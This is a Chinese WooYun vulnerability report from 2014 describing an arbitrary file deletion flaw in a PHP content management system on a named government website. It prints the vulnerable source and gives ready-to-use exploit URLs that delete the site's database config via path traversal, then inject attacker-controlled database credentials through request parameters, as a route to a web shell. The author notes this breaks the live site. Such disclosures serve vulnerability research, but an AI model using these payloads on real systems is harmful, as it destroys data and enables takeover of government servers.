当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-084830

漏洞标题:某Gov在用系统任意文件删除导致可getshell

相关厂商:台州市极速网络有限公司

漏洞作者: 路人甲

提交时间:2014-11-26 21:01

修复时间:2015-02-24 21:02

公开时间:2015-02-24 21:02

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-26: 细节已通知厂商并且等待厂商处理中
2014-12-01: 厂商已经确认,细节仅向厂商公开
2014-12-04: 细节向第三方安全合作伙伴开放
2015-01-25: 细节向核心白帽子及相关领域专家公开
2015-02-04: 细节向普通白帽子公开
2015-02-14: 细节向实习白帽子公开
2015-02-24: 细节向公众公开

简要描述:

逻辑。。。逻辑。。。
整套系统采用全局变量。攻击思路如下: 删除数据库配置文件--->利用get、post、cookie方式重新赋值$host,$dbname,$dbpass--->从而控制整个数据库(自己搭建远程数据库)--->找eval函数,直接getshell。。。
这样做会导致网站直接挂掉。(太暴力了)

详细说明:

看这里,看这里 ...
WooYun: 某Gov在用系统存在PHP代码执行漏洞
在网站根目录当中有一个picup.php文件

<?php
require "./includes/headinc.php";
if($action == 'del') {
@unlink("./data/$pic");
$up_err = "删除成功";
}elseif($upsubmit) {
//require_once './includes/upload.php';
$picftpsave = 'pic';
$maxpicftpsize = '100000';
$picftp_extensions = 'gif,jpg,png';
if($picftp) {
pic_attach_upload2();
if($up_err) {
$upaction = 0;
$content = $up_err;
}else {
$upaction = 1;
$up_err = "上传成功";
}
}
}
include getData('union_picup');
function pic_attach_upload2() {
global $up_err,$picftpsave,$picftp, $picftp_name, $picftp_type, $picftp_size, $picftp_fname, $maxpicftpsize, $picftp_extensions;
$paint_path = './data';

.....//省略若干代码


其中headinc.php文件里面没有权限限制。
代码如下:

<?php
if(is_file('./includes/360safe/360webscan.php')){

require_once('./includes/360safe/360webscan.php');
}
error_reporting(E_ERROR | E_WARNING | E_PARSE);
if (function_exists('date_default_timezone_set')) {
date_default_timezone_set('Etc/GMT-8');
}
$mtime = explode(' ', microtime());
define("KIN_1_UNION_748_xPo1XXyOU___sspx_qee_PM555_",TRUE);
set_time_limit(0);set_magic_quotes_runtime(0);
if (!isset($_REQUEST)){$_REQUEST = array_merge($_GET, $_POST, $_COOKIE);}
if(getenv('HTTP_X_FORWARDED_FOR')!='') {
$yip = (!empty($_SERVER['REMOTE_ADDR'])) ? $_SERVER['REMOTE_ADDR'] : ( ( !empty($_ENV['REMOTE_ADDR']) ) ? $_ENV['REMOTE_ADDR'] : $_SERVER['REMOTE_ADDR'] );
if (preg_match("/^([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/", getenv('HTTP_X_FORWARDED_FOR'), $ip_list)) {
$private_ip = array('/^0\./', '/^127\.0\.0\.1/', '/^192\.168\..*/', '/^172\.16\..*/', '/^10..*/', '/^224..*/', '/^240..*/');
$yip = preg_replace($private_ip, $client_ip, $ip_list[1]);
}
}else {
$yip = ( !empty($_SERVER['REMOTE_ADDR']) ) ? $_SERVER['REMOTE_ADDR'] : ( ( !empty($_ENV['REMOTE_ADDR']) ) ? $_ENV['REMOTE_ADDR'] : $_SERVER['REMOTE_ADDR'] );
}
$ssid = md5($_SERVER['HTTP_USER_AGENT'].$yip);
if(empty($referer) && isset($_SERVER['HTTP_REFERER'])) {
$referer = $_SERVER['HTTP_REFERER'];
}
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$SCRIPT_FILENAME = str_replace('\\\\', '/', ($_SERVER['PATH_TRANSLATED'] ? $_SERVER['PATH_TRANSLATED'] : $_SERVER['SCRIPT_FILENAME']));
$union_root = substr($SCRIPT_FILENAME, 0, strrpos($SCRIPT_FILENAME, '/') + 1);
$union_root = '';
//header("Cache-control: private");
require './includes/config.php';
require './includes/dbClass.php';
if($IS_LOGIN == true) {#若是进入后台管理(admin.php),则启用会话
require './includes/sess.php';
}
require './includes/global.php';
$timestamp = time();$magic_quotes_gpc = get_magic_quotes_gpc();$register_globals = @ini_get('register_globals');
$set_cachetime = '1800';
$UNION_SESSION = $UNION_CACHE = $UNION_USER = array();
$currscript = basename($_SERVER['PHP_SELF']);
$currscript = substr($currscript, 0, strpos($currscript, '.php'));
$creatsession = false;
unset($union_user,$union_uid,$condi);
if(!@ini_get('register_globals') || !get_magic_quotes_gpc()) {
@extract(union_addslashes($_REQUEST));
if(!@ini_get('register_globals')) {
if(is_array($_FILES))
foreach($_FILES as $key => $val) {
$$key = $val['tmp_name'];
${$key.'_name'} = $val['name'];
${$key.'_size'} = $val['size'];
${$key.'_type'} = $val['type'];
}
}
}
//栏目列表
$col_list = $db->fetchData("select * from table_columns where del='0' order by seq ASC");
//栏目分类
$col_cate_list = $db->fetchData("select * from table_columns_cate where del='0' order by seq ASC");
//栏目模板
$col_cate_tpl = $db->fetchData("select * from table_columns_tpl where del='0'");
foreach($col_list as $key=>$val){
if($col==$key){
$navAddC[$key]="images/index/menu3.jpg";}
foreach($col_cate_list as $key2=>$val2){

if($val[id]==$val2[cid]&&$val2[pid]=='-1'){
$aa=aaa.$val[id];
if($val2[tourl]) {
$$aa .= "&nbsp;<a style=font-size:9pt;line-height:14pt; href=\"$val2[tourl]\"><font color=\"#FFFFFF\">·$val2[name]</font></a>&nbsp;<br>";
}else {
$$aa .= "&nbsp;<a style=font-size:9pt;line-height:14pt; href=\"web-col$val[id]-actlist-cid$val2[id].html\"><font color=\"#FFFFFF\">·$val2[name]</font></a>&nbsp;<br>";
}
}
}
}
if($cfg_use_check == true) {
$cfg2_check_list = $db->fetchData("select * from table_info_check order by checknum ASC");
foreach($cfg2_check_list as $v) {
$cfg2_check_success = $v['checknum'];
}
}
###########link
$perpage = 5;
if(!$page) {
$page = 1;
}
$offset = ($page - 1) * $perpage;
$rsult = $db->fetchSingle("SELECT COUNT(*) as num FROM oa_columns_cate where del='0' && type='link'");
$num = $total = $rsult[num];
$multipage = pages($num, $perpage, $page, "$baseurl&saction=$saction");
$inforr_list = $db->fetchData("select * from oa_columns_cate where del='0' && type='link' order by seq ASC LIMIT $offset, $perpage");
###########link
$perpage = 20;
if(!$page) {
$page = 1;
}
$offset = ($page - 1) * $perpage;
$rsult = $db->fetchSingle("SELECT COUNT(*) as num FROM oa_columns_cate where del='0' && type='link'");
$num = $total = $rsult[num];
$multipage = pages($num, $perpage, $page, "$baseurl&saction=$saction");
$inforr_list2 = $db->fetchData("select * from oa_columns_cate where del='0' && type='link' order by seq ASC LIMIT $offset, $perpage");
$link_list = $db->fetchData("select * from oa_link where del='0' order by dtime DESC");
?>


看其中变量赋值方式..

if(!@ini_get('register_globals') || !get_magic_quotes_gpc()) {
@extract(union_addslashes($_REQUEST));
if(!@ini_get('register_globals')) {
if(is_array($_FILES))
foreach($_FILES as $key => $val) {
$$key = $val['tmp_name'];
${$key.'_name'} = $val['name'];
${$key.'_size'} = $val['size'];
${$key.'_type'} = $val['type'];
}
}
}


所以直接即访问:www.jjqjcy.gov.cn/picup.php?action=del&pic=../includes/config.php
(千万别访问,一访问,网站就挂了)
第二部、远程搭建一个该类型数据库
然后重新赋值以下几个变量

$dbhost = '182.2.x.x';   	// 数据库服务器
$dbuname = "jjxxxy"; // 数据库用户名
$dbpass = "xx"; // 数据库密码
$dbname = 'jjqjcy';


如采用
www.jjqjcy.gov.cn/picup.php?action=del&pic=../includes/config.php&dbhost=3.3.3.3&dbuname=3333&dbpass=3333&dbname=dddd
找到网站当中的其他eval函数,控制该数据库某变量即可getshell(其中找eval测试我就不提供了)。。这样会导致很多站挂。。。(请参考13年qibocms getshell)
太黄太暴力,各位测试的需小心...本文只提供思路...后果自负..

漏洞证明:

www.jjqjcy.gov.cn/picup.php?action=del&pic=../includes/configxxxxxxxx.php(千万别访问,你可以删其他的,你一访问,站就挂了)

修复方案:

过滤吧,加权限

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-12-01 11:35

厂商回复:

最新状态:

暂无